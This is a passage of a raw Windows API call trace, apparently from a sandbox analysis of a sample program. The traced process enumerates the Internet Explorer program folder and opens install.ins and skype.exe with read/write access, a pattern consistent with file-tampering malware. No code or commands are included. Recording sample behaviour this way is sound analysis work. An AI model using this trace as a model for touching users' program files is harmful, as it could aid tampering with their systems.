(dwErrCode=0x5) [0089.826] GetLastError () returned 0x5 [0089.826] SetLastError (dwErrCode=0x5) [0089.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67480 | out: hHeap=0x20000) returned 1 [0089.826] AreFileApisANSI () returned 1 [0089.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0089.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x676c0 [0089.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x676c0, cchWideChar=42 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\SIGNUP") returned 42 [0089.827] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP" (normalized: "c:\\program files\\internet explorer\\signup"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.827] GetLastError () returned 0x5 [0089.827] GetLastError () returned 0x5 [0089.827] SetLastError (dwErrCode=0x5) [0089.827] GetLastError () returned 0x5 [0089.827] SetLastError (dwErrCode=0x5) [0089.827] GetLastError () returned 0x5 [0089.827] SetLastError (dwErrCode=0x5) [0089.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x676c0 | out: hHeap=0x20000) returned 1 [0089.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0089.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0089.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0089.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0089.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0089.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0089.827] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3918ee0, ftCreationTime.dwHighDateTime=0x1d579ff, ftLastAccessTime.dwLowDateTime=0x2f5acd50, ftLastAccessTime.dwHighDateTime=0x1d554c8, ftLastWriteTime.dwLowDateTime=0x2f5acd50, ftLastWriteTime.dwHighDateTime=0x1d554c8, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="skype.exe", cAlternateFileName="")) returned 1 [0089.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0089.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0089.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0089.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0089.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0089.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0089.827] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78750 [0089.828] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb77a1634, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb77a1634, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.828] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30c952e, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x970b4468, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x970b4468, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="install.ins", cAlternateFileName="")) returned 1 [0089.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0089.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0089.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0089.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0089.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x464a8 [0089.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0089.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0089.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0089.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0089.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0089.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0089.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0089.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0089.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0089.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0089.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8b078 [0089.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0089.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0089.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0089.829] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.829] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.829] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.829] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0089.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.829] AreFileApisANSI () returned 1 [0089.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins", lpUsedDefaultChar=0x0) returned 54 [0089.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0089.829] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.829] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0089.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0089.829] AreFileApisANSI () returned 1 [0089.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0089.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75fa8 [0089.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 54 [0089.829] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0089.830] GetFileType (hFile=0x27c) returned 0x1 [0089.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0089.830] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.830] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.831] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.831] CloseHandle (hObject=0x27c) returned 1 [0089.831] AreFileApisANSI () returned 1 [0089.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0089.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76020 [0089.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 54 [0089.831] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0089.831] GetFileType (hFile=0x27c) returned 0x1 [0089.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0089.831] CloseHandle (hObject=0x27c) returned 1 [0089.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0089.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0089.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0089.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0089.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0089.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0089.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0089.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0089.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0089.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0089.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0089.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0089.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0089.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0089.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0089.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0089.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.832] AreFileApisANSI () returned 1 [0089.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0089.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75eb8 [0089.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 54 [0089.832] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30c952e, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x970b4468, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x970b4468, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c4)) returned 1 [0089.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0089.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0089.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.833] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x6a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69db8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x6a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="NU", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓DŽ")) returned 0 [0089.833] FindClose (in: hFindFile=0x78750 | out: hFindFile=0x78750) returned 1 [0089.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0089.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0089.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0089.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0089.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0089.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0089.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0089.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0089.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0089.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0089.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0089.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0089.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0089.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0089.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0089.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0089.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0089.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a430 [0089.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0089.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0089.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0089.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0089.834] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.834] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.834] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.834] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0089.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.834] AreFileApisANSI () returned 1 [0089.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\skype.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\skype.exe", lpUsedDefaultChar=0x0) returned 45 [0089.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0089.834] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.834] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0089.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0089.834] AreFileApisANSI () returned 1 [0089.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0089.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0089.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\skype.exe") returned 45 [0089.834] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\skype.exe" (normalized: "c:\\program files\\internet explorer\\skype.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0089.834] GetFileType (hFile=0x420) returned 0x1 [0089.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0089.835] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.835] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.835] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.835] CloseHandle (hObject=0x420) returned 1 [0089.835] AreFileApisANSI () returned 1 [0089.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: 